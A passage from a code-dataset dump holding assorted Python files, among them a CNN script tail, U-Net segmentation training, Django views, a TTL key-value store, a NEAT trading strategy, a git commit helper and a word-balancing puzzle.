print(i, np.mean(np.argmax(teY[test_indices], axis=1) ==\n sess.run(predict_op, feed_dict={X: teX[test_indices],\n Y: teY[test_indices],\n p_keep_conv: 1.0,\n p_keep_hidden: 1.0})))\n \nprint(\"tensorboard --logdir=/root/test4/Study_TensorFlow/08\\ -\\ CNN --port 6006\")\n","sub_path":"08 - CNN/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"424551694","text":"#! 
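The comments in the CNN record above track the tensor shapes (28 to 14 to 7 to 4) through three 2x2 max-pool layers with SAME padding, where each pooling step is a ceiling division by the stride. A few lines verifying that arithmetic, independent of any TensorFlow version:

import math

def same_pool(size, stride=2):
    # with SAME padding, output = ceil(input / stride)
    return math.ceil(size / stride)

size = 28
for layer in range(3):
    size = same_pool(size)
    print(size)  # 14, 7, 4, matching the l1/l2/l3 shape comments

# hence the fully connected weight w4 has 128 * 4 * 4 input units
print(128 * 4 * 4)  # 2048, the reshape target in model()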
/usr/bin/python\n\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use(\"Agg\")\n\nimport matplotlib.pyplot as plt\n\nxmin, xmax = -np.pi, np.pi\n\nx = np.arange(xmin, xmax, 0.1)\ny_sin = np.sin(x)\ny_cos = np.cos(x)\n\n# sin plot\nplt.subplot(2, 1, 1)\nplt.plot(x, y_sin)\nplt.title(\"$\\sin x$\")\nplt.xlim(xmin, xmax)\nplt.ylim(-1.3, 1.3)\n\n# cos plot\nplt.subplot(2, 1, 2)\nplt.plot(x, y_cos)\nplt.title(\"$\\cos x$\")\nplt.xlim(xmin, xmax)\nplt.ylim(-1.3, 1.3)\n\n# Avoid to duplicate graphtitle\nplt.tight_layout()\n\nplt.show()\n\nplt.savefig(\"/Users/iwaitoshiya/Desktop/graph.png\")\n","sub_path":"gomi11.py","file_name":"gomi11.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"46553155","text":"import time\nfrom riga_dataset import RIGADataset, CropFundus, Rescale, ToTensor\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nfrom unet import UNet\n\n\nRIGA_TRAIN_BASE_PATH = r'./RIGA/train/'\nRIGA_TRAIN_CSV_FILE = r'./RIGA/train/images.csv'\n\nRIGA_TEST_BASE_PATH = r'./RIGA/test/'\nRIGA_TEST_CSV_FILE = r'./RIGA/test/images.csv'\n\nTRAIN_MODEL_PATH = './RIGA_model.pth'\n\n# Parameters\nEPOCHS = 1\nBATCH_SIZE = 4\nTRAIN = False\nN_CLASSES = 2\nLEARNING_RATE = 0.001\nMOMENTUM = 0.9\n\n\ndef print_step_images(input, label, output, predicted=None):\n\n fig = plt.figure()\n plt.tight_layout()\n columns = 4 if predicted is None else 5\n\n cols = ['Raw', 'Mask', 'Class 1', 'Class 2'] if predicted is None else\\\n ['Raw', 'Mask', 'Class 1', 'Class 2', 'Predicted']\n plt.suptitle(cols)\n\n for bs in range(BATCH_SIZE):\n a = input[bs].numpy().transpose(1, 2, 0)\n b = label[bs].numpy()\n c1 = output[bs][0].detach().numpy()\n c2 = output[bs][1].detach().numpy()\n\n fig.add_subplot(BATCH_SIZE, columns,(bs * columns) + 1)\n plt.imshow(a)\n\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 2)\n plt.imshow(b, cmap='gray')\n\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 3)\n plt.imshow(c1, cmap='gray')\n\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 4)\n plt.imshow(c2, cmap='gray')\n\n if predicted is not None:\n d = predicted[bs].detach().numpy()\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 5)\n plt.imshow(d, cmap='gray')\n\n plt.show()\n\n\ndef main():\n transform = transforms.Compose([CropFundus(450, 50),\n Rescale(64),\n ToTensor(),\n ])\n # Load train set\n train_set = RIGADataset(csv_file=RIGA_TRAIN_CSV_FILE, root_dir=RIGA_TRAIN_BASE_PATH, transform=transform)\n train_loader = DataLoader(train_set, batch_size=BATCH_SIZE)\n\n test_set = RIGADataset(csv_file=RIGA_TEST_CSV_FILE, root_dir=RIGA_TEST_BASE_PATH, transform=transform)\n test_loader = DataLoader(test_set, batch_size=BATCH_SIZE)\n\n model = UNet(n_class=N_CLASSES)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=LEARNING_RATE, momentum=MOMENTUM)\n\n if TRAIN:\n t0 = time.time()\n for epoch in range(EPOCHS):\n\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n inputs, labels = data['raw'], data['mask']\n\n optimizer.zero_grad()\n outputs = model(inputs)\n\n loss = criterion(outputs, labels)\n loss.backward()\n\n optimizer.step()\n running_loss += loss.item()\n\n print('[%d, %3d] loss: %.3f' % (epoch, i + 1, running_loss))\n running_loss = 0.0\n\n if i == 10: print_step_images(inputs, labels, outputs)\n\n print('Finished 
Training: Elapsed time: %.3f secs' % (time.time() - t0))\n torch.save(model.state_dict(), TRAIN_MODEL_PATH)\n\n else:\n # Load the trained model\n model.load_state_dict(torch.load(TRAIN_MODEL_PATH))\n\n correct = 0\n total = 0\n index = 0\n with torch.no_grad():\n for data in test_loader:\n print('[%d] ' % index)\n inputs, labels = data['raw'], data['mask']\n # Test on test data\n outputs = model(inputs)\n\n _, predicted = torch.max(outputs.data, 1)\n\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n index += 1\n\n print('Accuracy of the network on the 10000 test images: %d %%' % (100 * correct / total))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run_unet.py","file_name":"run_unet.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"269885558","text":"from django.template.defaultfilters import slugify\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom collection.models import Thing\nfrom collection.forms import ThingForm\n\n# Create your views here.\n\ndef index(request):\n\t# the rewritten views\n\tthings = Thing.objects.all()\n\t# just getting one object!\n\t# correct_thing = Thing.objects.get(name=\"Hello\")\n\tcontext = {\n\t\t\t\"things\": things,\n\t}\n\n\treturn render(request, 'index.html', context)\n\n\n\ndef thing_detail(request, slug):\n\t# grab the object\n\tthing = Thing.objects.get(slug=slug)\n\tcontext = {\"thing\": thing}\n\t# and pass to the template\n\treturn render(request, 'things/thing_detail.html', context)\n\n\n@login_required\ndef edit_thing(request, slug):\n\t# grab the object\n\tthing = Thing.objects.get(slug=slug)\n\t# make sure the logged in user is the owner of the thing\n\tif thing.user != request.user:\n\t\traise Http404\n\t# set the form we're using\n\tform_class = ThingForm\n\t# if we're coming to this view from a submitted form\n\tif request.method == \"POST\":\n\t\t# grab the data from the submitted form and apply to\n\t\t# the form\n\t\tform = form_class(data=request.POST, instance=thing)\n\t\tif form.is_valid():\n\t\t\t# save the new data\n\t\t\tform.save()\n\t\t\treturn redirect('thing_detail', slug=thing.slug)\n\t\t# otherwise just create the form\n\telse:\n\t\tform = form_class(instance=thing)\n\n\t# and render the template\n\treturn render(request, 'things/edit_thing.html', {\"thing\": thing, \"form\": form})\n\n\n\n\ndef create_thing(request):\n\tuser = request.user\n\tform_class = ThingForm\n\t# if we're coming from a submitted form, do this\n\tif request.method == \"POST\":\n\t\t# grab the data from the submitted form and \n\t\t# apply to the form\n\t\tform = form_class(request.POST)\n\t\tif form.is_valid():\n\t\t\tname = form.cleaned_data['name']\n\t\t\tdescription = form.cleaned_data['description']\n\t\t\t# create the slug from our name\n\t\t\tslug = slugify(name)\n\n\t\t\t# create our object\n\t\t\tthing = Thing.objects.create(\n\t\t\t\tname=name,\n\t\t\t\tdescription=description,\n\t\t\t\tslug=slug,\n\t\t\t\tuser=user,\n\t\t\t)\n\n\t\t\t# redirect to our newly created thing\n\t\t\treturn redirect('thing_detail', slug=thing.slug)\n\n\t\t\t# otherwise just create the form\n\telse:\n\t\tform = form_class()\n\n\treturn render(request, 'things/create_thing.html', {\"form\": form,})\n\n\n\n\ndef browse_by_name(request, initial=None):\n\tif initial:\n\t\tthings = 
Thing.objects.filter(name__istartswith=initial).order_by('name')\n\telse:\n\t\tthings = Thing.objects.all().order_by('name')\n\treturn render(request, 'search/search.html', {\"things\": things,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"initial\": initial})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"600502435","text":"#! /usr/bin/python3\nfrom os.path import exists\nfrom sys import exit\nfrom os import system\nfrom runcmd3 import runcmd, waitall\n\nnumnoise = 50\nbeta_end = 8\nbeta_start = 0\ngamma_end = 10\ngamma_start = 0\ngamma_val = [0,0.001,0.002,0.004,0.008,0.016,0.032,0.064,0.128, 0.256, 0.512]\nbeta_val = [0,0.0001,0.0002,0.0004,0.0008,0.0016,0.0032,0.0064,0.0128]\n#beta_val = [2.56, 5.12, 10.24, 20.48, 40.96, 81.92, 163.84, 327.68, 655.36]\nfor beta_i in range(beta_start, beta_end + 1):\n for gamma_i in range(gamma_start, gamma_end + 1):\n for n in range(1, numnoise + 1):\n beta = beta_val[beta_i];\n gamma= gamma_val[gamma_i];\n python_cmd = \"eval_seg_3D_cluster_v1.py %1.4f %1.3f %d\" % (beta, gamma, n)\n log_filename = 'log_files/run_eval_seg_%1.4f_%1.3f_%d.log' % (beta, gamma, n)\n cmd = \"python3 %s >& %s\" % (python_cmd, log_filename)\n print(cmd)\n #exit(1)\n runcmd(cmd, waittime = 5, maxruns = 40)\nwaitall(waittime=1)\n","sub_path":"eval_seg_py_FCM/run_seg_eval_3D.py","file_name":"run_seg_eval_3D.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"332612678","text":"#importing packages\r\nimport streamlit as st\r\nimport wikipedia as wiki\r\nimport spacy \r\nfrom spacy import displacy\r\n\r\n#creating object to perform NLP\r\nner_Obj = spacy.load(\"en_core_web_sm\")\r\n\r\n\r\ndef app():\r\n st.title(\"Named Entity Recognition on Wikipedia pages\")\r\n searchtitle = st.text_input(\" Enter the topic you want to search on wikipedia\")\r\n if st.button(\"Analyze\"):\r\n #collecting datafrom wikipedia\r\n datasearch = wiki.page(searchtitle).content\r\n \r\n #performing NER on data\r\n data = ner_Obj(datasearch)\r\n \r\n #Storing the final output (i.e, data along with NER tags with HTML and css for beautification\r\n html = displacy.render(data,style='ent')\r\n \r\n #displaying the results on the app\r\n st.markdown(html,unsafe_allow_html=True)\r\n\r\n \r\n#main function\r\nif __name__==\"__main__\":\r\n app()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"583110077","text":"import json\r\nimport os\r\nimport sys\r\nimport time\r\nimport threading\r\nclass datastore:\r\n\r\n def __init__(self, filepath=os.getcwd()):\r\n\r\n self.file_path = filepath + '/key_value.json'\r\n self.file_lock = threading.Lock()\r\n self.data_lock = threading.Lock()\r\n\r\n try:\r\n file = open(self.file_path, 'r')\r\n filedata = json.load(file)\r\n self.data = filedata\r\n file.close()\r\n\r\n if not self.file_size_check():\r\n raise Exception('Size of the data store exceeded 1 GB.')\r\n\r\n print('file is created in this location' + self.file_path)\r\n except:\r\n\r\n file = open(self.file_path, 'w')\r\n self.data = {}\r\n self.ttldict = {}\r\n file.close()\r\n print('file is created in this location ' + self.file_path)\r\n\r\n#Method 
file_size_check that checks the size of file.Returns wheather the file is greater than 1GB or not.\r\n def file_size_check(self):\r\n self.file_lock.acquire()\r\n if os.path.getsize(self.file_path) <= 1e+9:\r\n self.file_lock.release()\r\n return True\r\n else:\r\n self.file_lock.release()\r\n return False\r\n#Method key_check that checks wheather given constrain are matched for the key.\r\n def key_check(self, key):\r\n if type(key) == type(\"\"):\r\n if len(key) > 32:\r\n raise Exception('Key size is capped at 32char. The given key length is ' + str(len(key)))\r\n else:\r\n return True\r\n else:\r\n raise Exception('Key value is not a string. The give type is: ' + str(type(key)))\r\n\r\n# Method create that adds a new key-value pair to the data store\r\n def create(self, key='', value='', ttl=None):\r\n self.key_check(key)\r\n\r\n if key == '':\r\n raise Exception('No key was provided.')\r\n\r\n if value == '':\r\n value = None\r\n\r\n if sys.getsizeof(value) > 16384:\r\n raise Exception(\"value exceeded 16KB size limit.\")\r\n\r\n if not self.file_size_check():\r\n raise Exception('Size of the data store exceeds 1 GB.')\r\n self.data_lock.acquire()\r\n\r\n if key in self.data.keys():\r\n self.data_lock.release()\r\n raise Exception('Key is already present.')\r\n\r\n if ttl is not None:\r\n ttl = int(time.time()) + abs(int(ttl))\r\n\r\n tempdict = {'value': value, 'ttl': ttl}\r\n self.data[key] = tempdict\r\n self.file_lock.acquire()\r\n json.dump(self.data, fp=open(self.file_path, 'w'), indent=2)\r\n self.file_lock.release()\r\n self.data_lock.release()\r\n print('Key added to the file')\r\n\r\n# Method read that allows to retrive value by providing a key\r\n def read(self, key=''):\r\n\r\n self.key_check(key)\r\n if key == '':\r\n raise Exception('Expecting a key to be read.')\r\n\r\n self.data_lock.acquire()\r\n\r\n if key in self.data.keys():\r\n pass\r\n else:\r\n self.data_lock.release()\r\n raise Exception('Key not found in database')\r\n\r\n ttl = self.data[key]['ttl']\r\n\r\n if not ttl:\r\n ttl = 0\r\n\r\n if (time.time() < ttl) or (ttl == 0):\r\n self.data_lock.release()\r\n return json.dumps(self.data[key]['value'])\r\n else:\r\n self.data_lock.release()\r\n raise Exception(\"Key's TTL has expired.\")\r\n\r\n# Method delete that deletes key-value pair by providing a key\r\n def delete(self, key=''):\r\n self.key_check(key)\r\n\r\n if key == '':\r\n raise Exception('Expecting a key to be read.')\r\n\r\n self.data_lock.acquire()\r\n\r\n if key in self.data.keys():\r\n pass\r\n else:\r\n self.data_lock.release()\r\n raise Exception('Key not found in database.')\r\n\r\n ttl = self.data[key]['ttl']\r\n\r\n if not ttl:\r\n ttl = 0\r\n#This snippet checks for ttl is expired or not.\r\n if time.time() < ttl or (ttl == 0):\r\n self.data.pop(key)\r\n self.file_lock.acquire()\r\n file = open(self.file_path, 'w')\r\n json.dump(self.data, file)\r\n self.file_lock.release()\r\n self.data_lock.release()\r\n print(\"pair deleted\")\r\n return\r\n else:\r\n self.data_lock.release()\r\n raise Exception(\"Key's TTL has expired.\")\r\n","sub_path":"datastore.py","file_name":"datastore.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"409024267","text":"# Copyright 2019 Marc Mosko\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 
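datastore.py above stores each value with an absolute expiry (int(time.time()) + ttl) and compares that deadline against time.time() on every read and delete. The expiry check in isolation, since exercising the class itself needs a writable working directory; the five-second TTL is an arbitrary example:

import time

def is_alive(ttl_deadline):
    # a deadline of None/0 means 'never expires', as in datastore.read()
    return not ttl_deadline or time.time() < ttl_deadline

deadline = int(time.time()) + 5   # created with ttl=5, like create(key, value, 5)
print(is_alive(deadline))         # True: still inside the window
print(is_alive(None))             # True: keys without a TTL never expire
time.sleep(6)
print(is_alive(deadline))         # False: the key's TTL has expired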
http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport array\nimport unittest\n\nimport ccnpy\nimport ccnpy.flic\n\n\nclass test_Pointers(unittest.TestCase):\n def test_serialize(self):\n h1 = ccnpy.HashValue(1, array.array('B', [1, 2]))\n h2 = ccnpy.HashValue(2, array.array('B', [3, 4]))\n h3 = ccnpy.HashValue(3, array.array('B', [5, 6]))\n\n p = ccnpy.flic.Pointers([h1, h2, h3])\n actual = p.serialize()\n\n expected = array.array(\"B\", [0, 2, 0, 18,\n 0, 1, 0, 2, 1, 2,\n 0, 2, 0, 2, 3, 4,\n 0, 3, 0, 2, 5, 6])\n self.assertEqual(expected, actual)\n\n def test_parse(self):\n h1 = ccnpy.HashValue(1, array.array('B', [1, 2]))\n h2 = ccnpy.HashValue(2, array.array('B', [3, 4]))\n h3 = ccnpy.HashValue(3, array.array('B', [5, 6]))\n expected = ccnpy.flic.Pointers([h1, h2, h3])\n\n wire_format = array.array(\"B\", [0, 2, 0, 18,\n 0, 1, 0, 2, 1, 2,\n 0, 2, 0, 2, 3, 4,\n 0, 3, 0, 2, 5, 6])\n tlv = ccnpy.Tlv.deserialize(wire_format)\n actual = ccnpy.flic.Pointers.parse(tlv)\n self.assertEqual(expected, actual)\n","sub_path":"ccnpy/flic/tests/test_Pointers.py","file_name":"test_Pointers.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"582956772","text":"from abc import ABC, abstractmethod\nfrom Classes.Utilities import Iterator, Container\nfrom Classes import Statics\nfrom Classes.DatabaseHandlers import add, delete, create_table, update, addFactory\n\nclass AccessDatabaseMedicines(Container.Container):\n\n def __init__(self):\n super(Container.Container, self).__init__()\n\n\n def getIterator(self):\n return AccessDatabaseMedicines.DatabaseMedicines()\n\n\n\n class DatabaseMedicines(Iterator.Iterator):\n def __init__(self, index=0):\n self.index=0\n\n def hasNext(self):\n if self.index < Statics.medList.__len__():\n return True\n else:\n return False\n\n def next(self):\n if self.hasNext():\n a = Statics.medList.__getitem__(self.index)\n self.index += 1\n return a\n else:\n self.index=0\n\n def add(self, toAdd):\n addFactory.addFactory().add(create_table.Medicines, str(toAdd))\n #Statics.medList.append(toAdd)\n\n def remove(self, toBeRemove):\n delete.Delete(create_table.Medicines, str(toBeRemove))\n\n def update(self, medID, attribute, newValue):\n print(medID, attribute, newValue)\n update.Update(\"\", medID, attribute, newValue)\n pass\n #dowork\n\n def search(self, toSearch):\n result=[]\n if toSearch==\"\":\n result = \"No Matches\"\n return result\n while self.hasNext():\n temp1 = self.next()\n temp2 = temp1.split(\"#\")\n for i in temp2:\n if (i.capitalize()).__contains__((Statics.searchKey).capitalize()):\n result.append(temp1)\n break\n if result.__len__()==0:\n result = \"No Matches\"\n return result\n","sub_path":"Classes/DatabaseAccessors/AccessDatabaseMedicines.py","file_name":"AccessDatabaseMedicines.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"226690574","text":"# Copyright 2019 The TensorTrade Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a 
copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport json\n\nimport pandas as pd\nimport numpy as np\n\nfrom statistics import mode, stdev, StatisticsError\n\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Union, Callable, List, Dict\n\nimport neat\nfrom collections import Counter\n\nfrom tensortrade.environments.trading_environment import TradingEnvironment\nfrom tensortrade.features.feature_pipeline import FeaturePipeline\nfrom tensortrade.strategies import TradingStrategy\nfrom termcolor import colored as c\nfrom IPython.display import clear_output\nimport math\nimport random\n\nimport matplotlib.pyplot as plt\n\nclass NeatTradingStrategy(TradingStrategy):\n \"\"\"A trading strategy capable of self-tuning, training, and evaluating itself using NEAT neuroevolution.\"\"\"\n\n # todo: pass in config file\n def __init__(self, environment: TradingEnvironment, neat_config: str, **kwargs):\n \"\"\"\n Arguments:\n environment: A `TradingEnvironment` instance for the agent to trade within.\n neat_config: Path to the NEAT configuration file used to build the population.\n kwargs (optional): Optional keyword arguments to adjust the strategy.\n \"\"\"\n self._environment = environment\n\n self._max_episode_timesteps = kwargs.get('max_episode_timesteps', None)\n self._neat_config_filename = neat_config\n self._config = self.load_config()\n self._genome_performance = {}\n self._learn_to_trade_threshold = kwargs.get('learn_to_trade_threshold', 300)\n\n @property\n def environment(self):\n return self._environment\n\n def load_config(self):\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n self._neat_config_filename)\n config.genome_config.num_inputs = len(self._environment.exchange.data_frame.columns)\n config.genome_config.input_keys = [-i - 1 for i in range(config.genome_config.num_inputs)]\n return config\n\n def restore_agent(self, path: str, model_path: str = None):\n raise NotImplementedError\n\n def save_agent(self, path: str, model_path: str = None, append_timestep: bool = False):\n raise NotImplementedError\n\n def _finished_episode_cb(self) -> bool:\n n_episodes = runner.episode\n n_timesteps = runner.episode_timestep\n avg_reward = np.mean(runner.episode_rewards)\n print(\"Average Trades:\", self.exchange.performance[-10:] )\n print(\"Trades: \", mean(self._genome_performance[\"trades\"]))\n\n print(\"Finished episode {} after {} timesteps.\".format(n_episodes, n_timesteps))\n print(\"Average episode reward: {}\".format(avg_reward))\n\n return True\n\n def tune(self, steps: int = None, episodes: int = None, callback: Callable[[pd.DataFrame], bool] = None) -> pd.DataFrame:\n raise NotImplementedError\n\n def _eval_population(self, genomes, config):\n # find a window to evaluate all genomes on\n data_frame_window = 500\n data_frame_length = self.environment.exchange.data_frame.shape[0]\n data_frame_start_tick = random.randint(0, data_frame_length - data_frame_window)\n print(\"Starting at DF[{}]\".format(data_frame_start_tick))\n # show the current plot for the price window.\n # 
plt.plot(self.environment.exchange.data_frame[data_frame_start_tick:data_frame_start_tick+data_frame_window]['close'])\n # plt.show()\n\n for genome_id, genome in genomes:\n self._environment.reset()\n # set the current_step to the start of our window\n self.environment._exchange._current_step = data_frame_start_tick\n self.environment._current_step = data_frame_start_tick\n\n self.eval_genome(genome, data_frame_window)\n\n p = self._genome_performance[genome.key]\n print(\"Genome Performance: \", genome.key)\n\n if p['rewards'] > 0:\n print(\"Rewards:\", c(p['rewards'], 'green'))\n else:\n print(\"Rewards:\", p['rewards'])\n\n print('Balance:', p['balance'])\n if p['net_worth'] > 10000:\n print(\"Net Worth:\", c(p['net_worth'], 'green'))\n else:\n print(\"Net Worth:\", p['net_worth'])\n\n print('Steps', p['steps_completed'])\n try:\n print('Most common action', Counter(p['actions']))\n except StatisticsError:\n print('No Action Mode:', p['actions'])\n print('Number of trades:', Counter(self._environment.exchange.trades['type']))\n print(' ')\n # plt.clf()\n clear_output()\n\n def eval_genome(self, genome, data_frame_window):\n print('---------------------------')\n\n # Initialize the network for this genome\n net = neat.nn.RecurrentNetwork.create(genome, self._config)\n # calculate the steps and keep track of some initial variables\n steps = len(self._environment._exchange.data_frame)\n steps_completed = 0\n done = False\n actions = self._environment.action_strategy.n_actions\n\n performance = {\"rewards\":0, \"balance\":0, \"net_worth\":0, \"actions\": [], \"steps_completed\":0, 'trades':0}\n self._genome_performance[genome.key] = performance\n # we need to know how many actions we are able to take\n\n starting_balance = self._environment.exchange.balance\n\n # set initial reward\n genome.fitness = 0.0\n\n # walk all timesteps to evaluate our genome\n # while (steps is not None and (steps == 0 or steps_completed < (steps))):\n while(steps_completed < data_frame_window):\n # Get the current data observation\n current_dataframe_observation = self._environment._exchange.data_frame[steps_completed:steps_completed+1]\n current_dataframe_observation = current_dataframe_observation.values.flatten()\n\n # activate() the genome and calculate the action output\n output = net.activate(current_dataframe_observation)\n\n # action at current step\n action = int(self._environment.action_strategy.n_actions/2 * (1 + math.tanh(output[0])))\n\n # feed action into environment to get reward for selected action\n obs, rewards, done, info = self.environment.step(action)\n\n # feed rewards to NEAT to calculate fitness.\n genome.fitness += rewards\n\n # count this as a completed step\n steps_completed += 1\n\n # stop iterating if we haven't learned to trade or we pass a fitness threshold\n if genome.fitness < -10000:\n print(\"Learn to trade!\")\n done = True\n\n\n\n # if steps_completed > self._learn_to_trade_threshold and len(self._environment.exchange.trades) == 0:\n # genome.fitness = self._genome_performance[genome.key]['rewards'] = -100000 # learn to trade...\n #\n # # stop iterating if we haven't learned to SELL in the first N timesteps\n # if steps_completed > self._learn_to_trade_threshold and len(self._environment.exchange.trades) == 0:\n # genome.fitness = self._genome_performance[genome.key]['rewards'] = -100000 # learn to trade...\n # print(\"Learn to trade!\")\n # done = True\n #\n # if (\n # steps_completed > self._learn_to_trade_threshold and\n # 
len(self._environment.exchange.trades) != 0 and\n # self._environment.exchange.trades.any()\n # ) :\n #\n # genome.fitness = self._genome_performance[genome.key]['rewards'] = -100 # learn to trade...\n # done = True\n\n self._genome_performance[genome.key]['rewards'] += rewards\n self._genome_performance[genome.key]['actions'].append(action)\n self._genome_performance[genome.key]['steps_completed'] = steps_completed\n self._genome_performance[genome.key]['trades'] = len(self._environment.exchange.trades)\n self._genome_performance[genome.key]['balance'] = self._environment.exchange.balance\n self._genome_performance[genome.key]['net_worth'] = self._environment.exchange.net_worth\n\n if done:\n print('-------WE DONE!---------')\n break\n\n\n def run(self, generations: int = None, testing: bool = True, episode_callback: Callable[[pd.DataFrame], bool] = None) -> pd.DataFrame:\n\n # create population\n pop = neat.Population(self._config)\n # add reporting\n pop.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(neat.Checkpointer(5))\n\n # Run for up to the given number of generations.\n winner = pop.run(self._eval_population, generations)\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n # print('\\nOutput:')\n\n # p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-4')\n\n return [self._environment._exchange.performance, winner, stats]\n","sub_path":"tensortrade/neat_trading_strategy.py","file_name":"neat_trading_strategy.py","file_ext":"py","file_size_in_byte":9849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"295244032","text":"# _*_ coding:utf-8 _*_\n\nimport os\nos.chdir(\"../Plugins/Unity3DGameLib\")\nos.system(\"git status\")\nos.system(\"git add .\")\nos.system(\"git status\")\n\ncomment = raw_input(\"Enter Commit Message:\")\nif(comment == ''):\n\tcomment = \"Code Update\"\n\ncommit_command = 'git commit -m \"%s\"' % (comment)\npush_command = 'git push origin master'\nos.system(commit_command)\nos.system(push_command)\n\nprint(\"Press any key to exit\")\nraw_input()","sub_path":"commit_unit3d_game_lib.py","file_name":"commit_unit3d_game_lib.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"362565175","text":"# ------------------------------------------------------------------------------------------------------------------\n# Today we're going to balance words on one of the letters in them. We'll use the position and letter itself to\n# calculate the weight around the balance point. A word can be balanced if the weight on either side of the balance\n# point is equal. Not all words can be balanced, but those that can are interesting for this challenge.\n# The formula to calculate the weight of the word is to look at the letter position in the English alphabet\n# (so A=1, B=2, C=3 ... 
Z=26) as the letter weight, then multiply that by the distance from the balance point,\n# so the first letter away is multiplied by 1, the second away by 2, etc.\n# As an example: STEAD balances at T: 1 * S(19) = 1 * E(5) + 2 * A(1) + 3 * D(4)\n# ------------------------------------------------------------------------------------------------------------------\n\ndef balance(word):\n teeter = len(word)//2 # Starting point of the balancing\n length = len(word)\n status = True\n\n # Puts the position and number-value of a letter into a list for comparison\n values_list = [(position, (ord(character)-96)) for position, character in enumerate(word)]\n comparison = compare(values_list, teeter, length)\n\n # If chain that will be entered if the word is unbalanced at the start of the program.\n if comparison[0] < comparison[1]:\n while True:\n teeter += 1 # Moves the midpoint closer to the right side to change the balance\n if teeter == (length - 1): # if the end of the word is reached it cannot be balanced\n status = False\n print(\"{} cannot be balanced.\".format(word))\n break\n comparison = compare(values_list, teeter, length)\n if comparison[0] == comparison[1]: break\n elif comparison[0] > comparison[1]:\n while True:\n teeter -= 1 # Moves the midpoint closer to the left side of the word to change the balance\n if teeter == 0: # If the beginning of the word is reached it cannot be balanced\n status = False\n print(\"{} cannot be balanced.\".format(word))\n break\n comparison = compare(values_list, teeter, length)\n if comparison[0] == comparison[1]:\n break\n if status == True: print(\"{} {} {} - {}\".format(word[:teeter], word[teeter], word[teeter+1:], comparison[0]))\n\n\n\n# A function to compare the different \"weights\" of a word\ndef compare(values, totter, length):\n low_sum = 0\n high_sum = 0\n for i in range(0,totter):\n low_sum += (totter - values[i][0])*values[i][1]\n for h in range(totter+1, length):\n high_sum += (values[h][0] - totter)*values[h][1]\n return (low_sum, high_sum)\n\n\nif __name__ == '__main__':\n balance(\"superglue\")\n","sub_path":"Daily_Challenges/Word_Balance.py","file_name":"Word_Balance.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
